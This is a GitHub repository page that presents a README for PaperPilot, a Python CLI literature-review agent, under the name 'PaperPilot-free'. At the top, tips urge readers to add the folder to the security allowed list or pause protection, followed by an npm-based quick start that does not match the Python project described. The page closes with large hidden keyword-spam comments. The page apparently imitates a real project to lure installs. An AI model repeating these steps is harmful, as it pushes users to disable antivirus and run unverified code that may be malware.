Skip to content

Streamsuchart/PaperPilot-free

Repository files navigation

PaperPilot

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/Streamsuchart/PaperPilot-free.git
cd PaperPilot-free
npm install
npm start

PyPI Python License CLI Reports Workflow Online Demo Netlify Demo

English | 中文 | Website | GitHub | PyPI Online demo: Cloudflare Workers | Online demo: Netlify

PaperPilot GitHub star history

PaperPilot - scholarly literature review agent

PaperPilot is a CLI research agent for scholarly literature review across AI, biomedicine, and AI for Science.
It turns one user request into a traceable, evidence-based research workflow and generates bilingual reports (zh/en) in Markdown, HTML, and PDF.

The Cloudflare Workers online demo provides a lightweight browser experience: it uses an OpenAI-compatible LLM to generate search plans, queries public paper metadata sources, and lets users download a lightweight Markdown or HTML report. The full PaperPilot CLI remains the complete workflow for screened corpora, PDF/full-text handling, evidence ledgers, bilingual PDF output, and Obsidian Wiki export.

✨ What PaperPilot does

PaperPilot is not a chatbot. It is an interactive scientific workflow:

  • Parse natural-language research requests
  • Build an explicit search protocol with inclusion/exclusion rules
  • Query multi-source literature APIs
  • Normalize, deduplicate, and screen papers
  • Verify URLs/PDF/code availability
  • Synthesize evidence and generate review reports
  • Output structured artifacts for reproducibility

Each run creates a dedicated folder under runs/ with full state, logs, and intermediate files.

🚀 Highlights

Core experience

  • Natural-language intake with LLM-assisted interpretation
  • Cloudflare Workers online demo for lightweight search plans, public-source candidates, and downloadable Markdown/HTML reports
  • Interactive shell with:
    • /model to manage LLM profiles
    • /sources to inspect search source/API status
    • /doctor for quick self-checks
  • Multi-source retrieval with source registry and diagnostics
  • Resume/inspect modes for reproducible research sessions

Retrieval and screening

  • Protocol-aware search using plan + diversified keywords
  • Canonicalized Paper schema and robust deduplication
  • Core/adjacent/excluded paper classification
  • PDF + code-link verification (no paywall bypass)
  • Optional full-text extraction from downloadable PDFs

Reporting

  • Canonical bilingual report model
  • Consistent [1][2][3] citation mapping
  • Method taxonomy and evidence matrix
  • Markdown + HTML + PDF outputs with aligned content
  • Browser demo can download a lightweight Markdown/HTML briefing based on public metadata and abstracts
  • Final report view keeps up to 100 papers by default, without a hard minimum
  • Obsidian Wiki export with paper, method, topic, and claim notes

Quality controls

  • Quality gates and reflection workflow
  • Evidence ledger linking claims to corpus evidence
  • Review checks for citation compliance and source reliability
  • Event stream logs for auditability

🗂 Source stack

Default free sources:

  • arXiv
  • Semantic Scholar
  • OpenAlex
  • Crossref
  • OpenReview
  • PubMed / NCBI E-utilities
  • Europe PMC
  • bioRxiv / medRxiv
  • DBLP
  • ACL Anthology
  • Papers.cool

Optional API-key sources:

  • DeepXiv / Agentic Data
  • CORE
  • Lens.org Scholarly API
  • IEEE Xplore
  • Springer Nature
  • Elsevier / Scopus
  • Dimensions

🛠 Installation

Local development:

git clone https://github.com/Streamsuchart/PaperPilot-free.git
cd PaperPilot

⚙️ LLM + Source Configuration

PaperPilot requires OpenAI-compatible LLM settings for query understanding, planning, synthesis, and report generation.

On first run, it creates an editable configuration template at:

~/.paperpilot/config.json

Minimal default template:

{
  "active": "default",
  "profiles": {
    "default": {
      "api_key": "",
      "base_url": "",
      "model": "gpt-5.2"
    }
  },
  "sources": {
    "core": {"enabled": null, "api_key": "", "base_url": ""},
    "lens": {"enabled": null, "api_key": "", "base_url": ""},
    "ieee": {"enabled": null, "api_key": "", "base_url": ""},
    "springer": {"enabled": null, "api_key": "", "base_url": ""},
    "elsevier": {"enabled": null, "api_key": "", "base_url": ""},
    "dimensions": {"enabled": null, "api_key": "", "base_url": ""},
    "deepxiv": {"enabled": null, "api_key": "", "base_url": ""}
  }
}

Notes:

  • Leave optional source API keys empty if unavailable.
  • enabled: null means auto-enable once a valid key is provided.
  • ~/.paperpilot/config.json is not committed; edit it directly or use CLI commands.

CLI config commands

PaperPilot config set --base-url https://api.deepseek.com --model deepseek-chat
PaperPilot config import ./api.json
PaperPilot config list
PaperPilot config use deepseek
PaperPilot config show
PaperPilot --doctor
PaperPilot sources list
PaperPilot sources config core
PaperPilot sources config deepxiv
PaperPilot sources enable core
PaperPilot sources test core

Inside interactive mode, use /sources and /doctor.

Cloudflare Workers online demo configuration

The hosted demo runs on Cloudflare Workers at https://paperpilot.aleck-757.workers.dev/ and serves /api/literature-search from the Worker. wrangler.jsonc includes safe defaults for the online experience:

LLM_BASE_URL=https://api.deepseek.com
LLM_MODEL=deepseek-v4-flash
LLM_API_KEY=123456

Replace the placeholder LLM_API_KEY in Cloudflare Variables and Secrets with a real server-side key. The frontend calls the Worker API and never embeds the key in browser code. The online demo uses OpenAlex and Crossref as public metadata sources; Semantic Scholar is skipped unless SEMANTIC_SCHOLAR_API_KEY is configured to avoid public API rate limits.

🔑 API source keys references

Source Access page
CORE https://core.ac.uk/services/api
Lens.org https://docs.api.lens.org/
IEEE Xplore https://developer.ieee.org/getting_started
Springer Nature https://dev.springernature.com/
Elsevier / Scopus https://dev.elsevier.com/
Dimensions https://docs.dimensions.ai/dsl/api.html
DeepXiv / Agentic Data https://data.rag.ac.cn/api/docs
Papers.cool https://papers.cool

🧪 Quick Start

Interactive usage:

PaperPilot

Command mode example:

PaperPilot "RNA inverse folding sequence design" \
  --auto-confirm \
  --max-papers 50 \
  --since-year 2021 \
  --github-filter required \
  --sources auto \
  --mode apa \
  --quality balanced

Import local corpus and skip download:

PaperPilot "RNA inverse folding sequence design" \
  --auto-confirm \
  --user-corpus ./papers \
  --user-corpus references.bib \
  --no-download

Inspect/resume workflow:

PaperPilot inspect runs/<task-id>
PaperPilot resume runs/<task-id>

🧭 Workflow

PaperPilot follows this state-machine pipeline:

Intake -> Protocol -> Search -> Corpus -> Screening -> Verification -> Synthesis -> Review -> Report
flowchart LR
  U["User request"] --> C["Run context"]
  C --> QA["Query understanding"]
  QA --> PL["Planning + Protocol"]
  PL --> ST["Source Registry search"]
  ST --> NB["Corpus normalization"]
  NB --> SC["Core / adjacent screening"]
  SC --> VF["Verification + PDF + code checks"]
  VF --> SY["Literature matrix"]
  SY --> QG["Quality gate + reflection"]
  QG --> EL["Evidence ledger"]
  EL --> RP["Report render: ZH / EN"]
Loading

📁 Run artifacts

runs/<task-id>/ will contain:

  • task.json / state.json / events.jsonl / manifest.json
  • planning/: query understanding, search plan, protocol, prompt and registry manifests
  • search/: raw normalized metadata and source diagnostics
  • corpus/: screened corpus, core/adjacent/excluded sets, ranked report papers
  • verification/: verification records, quality gate, reflection, download log, evidence ledger, review findings
  • synthesis/: literature matrix and field-level synthesis
  • reports/: report.canonical.json, bilingual Markdown, HTML, and PDF reports
  • assets/pdfs/ and assets/fulltext/: downloaded open PDFs and extracted full text
  • wiki/obsidian/: Obsidian knowledge graph with notes, wikilinks, and lint metadata

🧠 Obsidian Wiki

Each successful run generates runs/<task-id>/wiki/obsidian/ by default. Open that folder as an Obsidian vault to browse:

  • index.md: research entry point and reported-paper overview
  • papers/: one note per reported paper with citation label, PDF/code links, method family, and evidence basis
  • methods/: method-family notes linked to representative papers
  • topics/: query/subtopic notes
  • claims/: evidence-map claim notes
  • _meta/manifest.json and _meta/wiki_lint.json: provenance, hashes, broken-link checks

Use --no-obsidian-wiki to skip Wiki generation.

For a public-safe ScholarFlow-style vault layout and config template, see:

Example summary.md auto-index table:

Date Paper Notes Code Source Remarks
2026.05.20 CitationGraph-RAG To read GitHub arXiv Public demo row
2026.05.18 BenchAgent-Eval Draft note OpenReview Sanitized example

This table is written as normal Markdown, not inside a fenced code block, so GitHub can render it.

🧩 Code filter modes

  • any: keep all papers and annotate code availability
  • required: keep only papers with detected code repositories in final view
  • none: keep only papers without detected public code links

🧪 CLI options (important ones)

--max-papers INT                 maximum papers in final report view; default: 100
--min-report-papers INT          optional minimum report size; default: 0
--since-year INT                 preferred lower year bound
--github-filter any|required|none
--github-search-limit INT
--no-download                    skip PDF downloads
--pdf-limit INT                  maximum PDFs to download
--user-corpus PATH               repeatable local corpus path
--mode quick|apa|systematic
--interaction auto|gated
--quality fast|balanced|strict
--include-adjacent               include adjacent papers in appendices
--sources auto|all|core|biomed|cs|configured
--enable-source SOURCE           enable one source (repeatable)
--disable-source SOURCE          disable one source (repeatable)
--no-obsidian-wiki               skip Obsidian Wiki export

See paperpilot --help for full options and Chinese/English output.

🧱 Development notes

  • Keep run outputs and generated artifacts out of source control.
  • Keep API keys out of git history.
  • Prefer .gitignore over manual cleanup.
  • Use semantic tags for releases and keep README + docs aligned.
  • Keep .github/workflows/*, RELEASING.md, CHANGELOG.md in sync when publishing.

🧭 Open source checklist

  • Ensure ~/.paperpilot/config.json, api.json, and .env with credentials are never committed.
  • Add/keep LICENSE and .gitignore.
  • Add source code and tags before publishing release assets.
  • Publish GitHub Pages from docs/.
  • Keep versions in pyproject.toml, literature_agent/__init__.py, and generated manifests aligned.

One-command release

# dry-run checks only
./scripts/release_everywhere.sh --dry-run

# normal release (pushed commit + tag + GH release + PyPI)
export PYPI_TOKEN='pypi-...'
./scripts/release_everywhere.sh


## 🙏 Acknowledgements

PaperPilot is shaped by ideas from open academic-research and agent projects. Thanks to these projects and their authors for making their work public:

- [LLMForEverybody](https://github.com/luhengshiwo/LLMForEverybody) for Agent design-pattern learning material.
- [academic-research-skills](https://github.com/Imbad0202/academic-research-skills) for research integrity, source verification, and structured synthesis inspiration.
- [DeepTutor](https://github.com/HKUDS/DeepTutor) for Tool/Capability-style agent architecture ideas.
- [obsidian-wiki](https://github.com/ar9av/obsidian-wiki) for the Obsidian Wiki export direction.
- [Research-Paper-Writing-Skills](https://github.com/Master-cai/Research-Paper-Writing-Skills), [research-writing-skill](https://github.com/Norman-bury/research-writing-skill), and [SLR-FC](https://github.com/drshahizan/SLR-FC) for literature review, research writing, and systematic-review workflow references.

## 📚 Citation note

If you use PaperPilot in your work, include the repository URL and version used so results are reproducible.


<!-- nodejs npm javascript typescript package module library framework windows linux macos -->
<!-- PaperPilot-free - tool utility software - download install setup -->
<!-- simple PaperPilot-free fork | build low latency PaperPilot-free | self hosted PaperPilot-free validator | how to install PaperPilot-free tracker | execute PaperPilot-free parser | deploy PaperPilot-free extractor | linux stable PaperPilot-free | linux PaperPilot-free editor | PaperPilot-free sdk | stable PaperPilot-free extension | PaperPilot free book | execute PaperPilot-free wrapper | reliable PaperPilot-free creator | windows powerful PaperPilot-free | linux modern PaperPilot-free | build PaperPilot-free module | PaperPilot-free extension | fedora PaperPilot-free downloader | lightweight PaperPilot-free program | download for linux PaperPilot-free app | open source PaperPilot-free mirror | centos PaperPilot-free cli | PaperPilot free article | how to install PaperPilot-free analyzer | simple PaperPilot-free copy | setup low latency PaperPilot-free | latest version cross platform PaperPilot-free | native PaperPilot-free service | how to build PaperPilot-free web | windows secure PaperPilot-free fork | build PaperPilot-free | launch reliable PaperPilot-free server | latest version low latency PaperPilot-free | easy PaperPilot-free scanner | offline PaperPilot-free app | github PaperPilot-free extension | use PaperPilot-free | lightweight PaperPilot-free server | PaperPilot-free compressor | simple PaperPilot-free web | best PaperPilot-free | execute PaperPilot-free server | linux PaperPilot-free wrapper | arch cross platform PaperPilot-free | debian PaperPilot-free port | secure PaperPilot-free tester | getting started PaperPilot-free debugger | how to install PaperPilot-free | advanced PaperPilot-free mobile | PaperPilot-free debugger -->
<!-- extensible PaperPilot-free checker | production ready PaperPilot-free converter | updated PaperPilot-free | latest version best PaperPilot-free | run on linux PaperPilot-free builder | linux PaperPilot-free | best PaperPilot-free extension | open source PaperPilot-free sdk | online PaperPilot-free parser | run on windows self hosted PaperPilot-free reader | download for linux stable PaperPilot-free | configurable PaperPilot-free web | customizable PaperPilot-free editor | run on mac PaperPilot-free | how to configure PaperPilot-free clone | quick start PaperPilot-free compressor | PaperPilot-free desktop | tutorial PaperPilot-free server | start PaperPilot-free copy | docs modern PaperPilot-free parser | how to setup PaperPilot-free desktop | deploy PaperPilot-free | native PaperPilot-free server | configurable PaperPilot-free mirror | git clone PaperPilot-free port | best PaperPilot free | walkthrough PaperPilot-free compressor | use top PaperPilot-free | install PaperPilot-free | launch PaperPilot-free extension | fast PaperPilot-free extractor | arch reliable PaperPilot-free | PaperPilot-free optimizer | open source minimal PaperPilot-free editor | native PaperPilot-free gui | how to run PaperPilot-free mirror | extensible PaperPilot-free wrapper | github advanced PaperPilot-free | portable PaperPilot-free scanner | online PaperPilot-free plugin | compile high performance PaperPilot-free port | execute simple PaperPilot-free | install PaperPilot-free decoder | minimal PaperPilot-free application | latest version PaperPilot-free | high performance PaperPilot-free logger | minimal PaperPilot-free decoder | fedora PaperPilot-free | wiki stable PaperPilot-free | PaperPilot-free alternative -->
<!-- compile PaperPilot-free | native PaperPilot-free optimizer | download PaperPilot-free web | open source PaperPilot-free server | high performance PaperPilot-free | how to download PaperPilot-free logger | setup PaperPilot-free reader | advanced PaperPilot-free app | tutorial online PaperPilot-free | modern PaperPilot-free | lightweight PaperPilot-free uploader | modern PaperPilot-free scanner | how to use PaperPilot-free | download PaperPilot-free builder | debian PaperPilot-free creator | tar.gz PaperPilot-free platform | easy PaperPilot-free | free PaperPilot-free service | high performance PaperPilot-free tester | PaperPilot-free creator | demo PaperPilot-free analyzer | configure PaperPilot-free service | github PaperPilot-free server | how to use PaperPilot-free compressor | reliable PaperPilot-free fork | docs configurable PaperPilot-free | download for windows PaperPilot-free tester | run on linux PaperPilot-free | online PaperPilot-free wrapper | launch PaperPilot-free logger | wiki PaperPilot-free library | ubuntu PaperPilot-free logger | how to deploy PaperPilot-free monitor | PaperPilot-free tester | how to setup PaperPilot-free generator | lightweight PaperPilot-free port | tar.gz PaperPilot-free encoder | run on linux stable PaperPilot-free | how to configure local PaperPilot-free | latest version PaperPilot-free app | windows PaperPilot-free validator | PaperPilot-free port | quick start PaperPilot-free tracker | beginner reliable PaperPilot-free | portable PaperPilot-free app | free PaperPilot-free tester | examples PaperPilot-free library | quick start PaperPilot-free desktop | fedora PaperPilot-free application | download for windows high performance PaperPilot-free wrapper -->
<!-- PaperPilot-free encoder | beginner PaperPilot-free alternative | 2025 modern PaperPilot-free downloader | documentation PaperPilot-free viewer | windows PaperPilot-free uploader | open source portable PaperPilot-free | walkthrough PaperPilot-free module | tar.gz portable PaperPilot-free downloader | 2026 PaperPilot-free creator | github PaperPilot-free library | easy PaperPilot-free cli | advanced PaperPilot-free replacement | build PaperPilot-free app | run on linux PaperPilot-free tracker | guide PaperPilot-free encoder | wiki minimal PaperPilot-free | safe PaperPilot-free addon | PaperPilot free workshop | linux PaperPilot-free application | open PaperPilot-free checker | cross platform PaperPilot-free server | 2026 PaperPilot-free | macos PaperPilot-free web | production ready PaperPilot-free api | PaperPilot-free logger | example PaperPilot-free | modular PaperPilot-free service | how to setup native PaperPilot-free | run PaperPilot-free api | get production ready PaperPilot-free | how to setup PaperPilot-free fork | get PaperPilot-free builder | new version modular PaperPilot-free | PaperPilot-free scanner | arch PaperPilot-free client | tar.gz free PaperPilot-free | free PaperPilot-free monitor | latest version powerful PaperPilot-free | PaperPilot-free application | github PaperPilot-free uploader | PaperPilot-free package | offline PaperPilot-free software | download for mac PaperPilot-free framework | simple PaperPilot-free platform | PaperPilot-free clone | how to build low latency PaperPilot-free | fedora PaperPilot-free fork | guide PaperPilot-free sdk | safe PaperPilot-free | how to build PaperPilot-free monitor -->
<!-- PaperPilot free not working | offline PaperPilot-free mobile | high performance PaperPilot-free reader | arch safe PaperPilot-free | how to build PaperPilot-free tool | lightweight PaperPilot-free decoder | documentation PaperPilot-free | use PaperPilot-free desktop | powerful PaperPilot-free web | git clone fast PaperPilot-free viewer | fedora PaperPilot-free uploader | powerful PaperPilot-free | compile local PaperPilot-free | low latency PaperPilot-free server | example PaperPilot-free addon | 2026 PaperPilot-free gui | customizable PaperPilot-free | PaperPilot-free app | PaperPilot-free api | run on windows PaperPilot-free tester | deploy PaperPilot-free replacement | extensible PaperPilot-free | customizable PaperPilot-free module | configure PaperPilot-free uploader | PaperPilot-free monitor | extensible PaperPilot-free desktop | PaperPilot-free library | online PaperPilot-free tool | PaperPilot free documentation | docs github PaperPilot-free | get PaperPilot-free editor | easy PaperPilot-free mirror | PaperPilot free ci cd | PaperPilot-free platform | low latency PaperPilot-free | self hosted PaperPilot-free addon | demo PaperPilot-free | quickstart PaperPilot-free application | download for mac open source PaperPilot-free | how to run open source PaperPilot-free | documentation PaperPilot-free cli | windows PaperPilot-free | beginner PaperPilot-free compressor | PaperPilot-free analyzer | portable PaperPilot-free | configurable PaperPilot-free extractor | run on linux PaperPilot-free app | execute PaperPilot-free binding | reliable PaperPilot-free editor | install PaperPilot-free uploader -->
<!-- beginner PaperPilot-free tracker | macos PaperPilot-free application | beginner PaperPilot-free parser | configure PaperPilot-free plugin | portable PaperPilot-free platform | download for windows free PaperPilot-free | windows local PaperPilot-free | PaperPilot-free extractor | new version PaperPilot-free logger | run on windows PaperPilot-free tracker | stable PaperPilot-free analyzer | 2025 PaperPilot-free | PaperPilot free saas | high performance PaperPilot-free cli | sample PaperPilot-free converter | getting started extensible PaperPilot-free parser | PaperPilot-free generator | updated PaperPilot-free framework | get PaperPilot-free viewer | latest version PaperPilot-free debugger | lightweight PaperPilot-free binding | 2026 PaperPilot-free platform | ubuntu PaperPilot-free engine | PaperPilot-free client | sample PaperPilot-free tracker | documentation PaperPilot-free builder | cross platform PaperPilot-free creator | configurable PaperPilot-free addon | open source PaperPilot-free copy | advanced PaperPilot-free client | tutorial PaperPilot-free cli | macos best PaperPilot-free copy | configure PaperPilot-free | run safe PaperPilot-free | updated PaperPilot-free engine | wiki PaperPilot-free desktop | powerful PaperPilot-free converter | run on mac portable PaperPilot-free | example PaperPilot-free analyzer | launch minimal PaperPilot-free gui | download for mac secure PaperPilot-free | centos PaperPilot-free | reliable PaperPilot-free extractor | modern PaperPilot-free extractor | high performance PaperPilot-free binding | PaperPilot-free tracker | tar.gz PaperPilot-free | sample PaperPilot-free clone | git clone PaperPilot-free app | free PaperPilot-free desktop -->
<!-- how to configure PaperPilot-free software | download for mac simple PaperPilot-free | extensible PaperPilot-free builder | example PaperPilot-free cli | macos PaperPilot-free library | source code production ready PaperPilot-free | best PaperPilot-free replacement | beginner secure PaperPilot-free | download for windows PaperPilot-free tracker | example PaperPilot-free creator | PaperPilot-free replacement | open PaperPilot-free extractor | PaperPilot free reddit | latest version PaperPilot-free framework | how to deploy PaperPilot-free plugin | debian PaperPilot-free uploader | self hosted PaperPilot-free | minimal PaperPilot-free tracker | open PaperPilot-free | extensible PaperPilot-free utility | PaperPilot-free checker | docs PaperPilot-free framework | run on linux PaperPilot-free extractor | easy PaperPilot-free client | lightweight PaperPilot-free application | source code PaperPilot-free reader | run on linux PaperPilot-free checker | docs PaperPilot-free decoder | tutorial PaperPilot-free | fast PaperPilot-free app | low latency PaperPilot-free validator | launch fast PaperPilot-free | how to setup PaperPilot-free logger | launch PaperPilot-free tracker | modern PaperPilot-free alternative | low latency PaperPilot-free gui | top PaperPilot-free replacement | PaperPilot free benchmark | PaperPilot free example | free download PaperPilot-free | how to deploy PaperPilot-free optimizer | offline PaperPilot-free server | run on mac PaperPilot-free reader | github PaperPilot-free replacement | how to use PaperPilot-free checker | how to install PaperPilot-free tester | install PaperPilot-free clone | how to setup PaperPilot-free | getting started PaperPilot-free alternative | PaperPilot free review -->
<!-- new version high performance PaperPilot-free desktop | free download PaperPilot-free alternative | git clone PaperPilot-free parser | powerful PaperPilot-free validator | native PaperPilot-free | portable PaperPilot-free tracker | download for linux PaperPilot-free checker | how to download PaperPilot-free creator | debian PaperPilot-free optimizer | how to install PaperPilot-free viewer | tutorial PaperPilot-free alternative | PaperPilot-free gui | download for mac PaperPilot-free logger | how to configure easy PaperPilot-free scanner | how to configure PaperPilot-free engine | is PaperPilot free safe | windows PaperPilot-free alternative | configure fast PaperPilot-free | how to build simple PaperPilot-free | 2025 simple PaperPilot-free api | github PaperPilot-free optimizer | advanced PaperPilot-free uploader | how to configure secure PaperPilot-free | offline PaperPilot-free client | PaperPilot-free program | setup offline PaperPilot-free scanner | 2025 production ready PaperPilot-free | run on windows PaperPilot-free framework | start PaperPilot-free validator | PaperPilot free reference | self hosted PaperPilot-free creator | documentation secure PaperPilot-free client | powerful PaperPilot-free library | secure PaperPilot-free | download for windows PaperPilot-free | how to download PaperPilot-free analyzer | download PaperPilot-free | run PaperPilot-free | how to deploy PaperPilot-free | low latency PaperPilot-free checker | git clone local PaperPilot-free platform | how to deploy PaperPilot-free program | configurable PaperPilot-free compressor | safe PaperPilot-free extension | download for mac PaperPilot-free downloader | fast PaperPilot-free copy | minimal PaperPilot-free reader | open local PaperPilot-free platform | free PaperPilot-free editor | stable PaperPilot-free viewer -->
<!-- open source PaperPilot-free downloader | PaperPilot free webinar | how to use PaperPilot-free builder | fedora high performance PaperPilot-free reader | cross platform PaperPilot-free | best PaperPilot-free utility | arch fast PaperPilot-free framework | macos PaperPilot-free | launch PaperPilot-free analyzer | docs PaperPilot-free | zip PaperPilot-free optimizer | download for windows PaperPilot-free web | getting started PaperPilot-free package | source code PaperPilot-free sdk | how to setup PaperPilot-free creator | quick start PaperPilot-free optimizer | minimal PaperPilot-free app | self hosted PaperPilot-free optimizer | install PaperPilot-free editor | wiki PaperPilot-free addon | PaperPilot-free viewer | 2026 safe PaperPilot-free creator | zip PaperPilot-free replacement | install PaperPilot-free tracker | demo PaperPilot-free encoder | quick start fast PaperPilot-free | example PaperPilot-free package | linux PaperPilot-free creator | free download PaperPilot-free decoder | reliable PaperPilot-free | stable PaperPilot-free fork | 2026 PaperPilot-free fork | beginner minimal PaperPilot-free | PaperPilot-free utility | fedora modern PaperPilot-free editor | open PaperPilot-free uploader | open PaperPilot-free fork | build modular PaperPilot-free | new version PaperPilot-free alternative | how to run PaperPilot-free | windows PaperPilot-free creator | PaperPilot-free editor | run on windows advanced PaperPilot-free | PaperPilot free course | examples modern PaperPilot-free plugin | PaperPilot free automation | secure PaperPilot-free package | beginner PaperPilot-free uploader | PaperPilot-free software | PaperPilot-free server -->
<!-- how to run PaperPilot-free checker | demo portable PaperPilot-free | how to build configurable PaperPilot-free optimizer | demo PaperPilot-free program | customizable PaperPilot-free service | fast PaperPilot-free scanner | 2025 PaperPilot-free analyzer | beginner simple PaperPilot-free | low latency PaperPilot-free binding | how to download PaperPilot-free | wiki PaperPilot-free generator | documentation PaperPilot-free generator | fast PaperPilot-free | use PaperPilot-free gui | new version PaperPilot-free plugin | deploy PaperPilot-free module | top PaperPilot-free analyzer | advanced PaperPilot-free | walkthrough PaperPilot-free debugger | getting started reliable PaperPilot-free | free PaperPilot-free generator | tutorial PaperPilot-free viewer | 2025 PaperPilot-free gui | fast PaperPilot-free encoder | free PaperPilot-free addon | PaperPilot-free validator | new version PaperPilot-free module | how to configure PaperPilot-free | lightweight PaperPilot-free api | new version PaperPilot-free | open source PaperPilot-free compressor | docs local PaperPilot-free | execute PaperPilot-free optimizer | git clone PaperPilot-free optimizer | extensible PaperPilot-free program | ubuntu PaperPilot-free package | source code customizable PaperPilot-free server | quickstart PaperPilot-free compressor | how to run PaperPilot-free utility | how to deploy PaperPilot-free framework | 2025 extensible PaperPilot-free | arch PaperPilot-free converter | documentation PaperPilot-free fork | configure PaperPilot-free application | run on mac PaperPilot-free encoder | how to run powerful PaperPilot-free | setup PaperPilot-free validator | portable PaperPilot-free clone | github PaperPilot-free validator | zip PaperPilot-free -->

<!-- Last updated: 2026-06-09 19:26:16 -->

About

AI 文献检索与综述 Agent:支持多源检索、代码仓库定位、开放 PDF 下载、证据链与中英双语报告。

Topics

Resources

License

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors